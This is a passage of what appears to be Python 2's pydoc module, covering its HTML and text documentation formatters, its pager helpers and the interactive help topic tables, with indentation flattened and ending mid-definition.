try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value, name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
try:
                value = getattr(object, key)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
pass
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
try:
attrs.sort(key=lambda t: t[0])
except TypeError:
attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br> </tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', join(submodules, '\n'))
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = _binstr(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', _binstr(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', _binstr(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', _binstr(object.__credits__))
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value,
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if type(sys.stdout) is not types.FileType:
return plainpager
if not hasattr(sys.stdin, "isatty"):
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
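# For example, plain() undoes the ch + backspace + ch overstriking produced by
# TextDoc.bold(): plain('p\bpy\by') (where \b is a backspace) returns 'py'.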
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(_encode(text))
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(_encode(text))
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = plain(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding))).split('\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
try:
h = int(os.environ.get('LINES', 0))
except ValueError:
h = 0
if h <= 1:
h = 25
r = inc = h - 1
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
                sys.stdout.write('\r          \r')
break
elif c in ('\r', '\n'):
                sys.stdout.write('\r          \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding)))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
else:
object = __builtin__
for part in parts[n:]:
try:
object = getattr(object, part)
except AttributeError:
return None
return object
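# A minimal usage sketch for locate()/resolve(); the dotted names below are
# illustrative only and are not part of this module:
#
#     locate('json.decoder.JSONDecoder')   # imports json.decoder, returns the class
#     locate('no.such.name')               # unresolvable paths return None
#
# resolve() (defined below) builds on locate(): resolve('json') yields
# (module, 'json'), while resolve(obj) returns obj together with its __name__
# when it has a string name.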
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
class _OldStyleClass: pass
_OLD_INSTANCE_TYPE = type(_OldStyleClass())
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if object is None:
raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
name = getattr(thing, '__name__', None)
return thing, name if isinstance(name, str) else None
def render_doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Render text documentation, given an object or a path to an object."""
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if type(object) is _OLD_INSTANCE_TYPE:
# If the passed object is an instance of an old-style class,
# document its available methods instead of its value.
object = object.__class__
elif not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + text.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
pager(render_doc(thing, title, forceload))
except (ImportError, ErrorDuringImport), value:
print value
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'exec': ('exec', ''),
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'print': ('print', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.iteritems():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING '
'TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS '
'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 '
'SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'COERCIONS': ('coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('conversions', 'COERCIONS'),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS '
'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr '
'ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
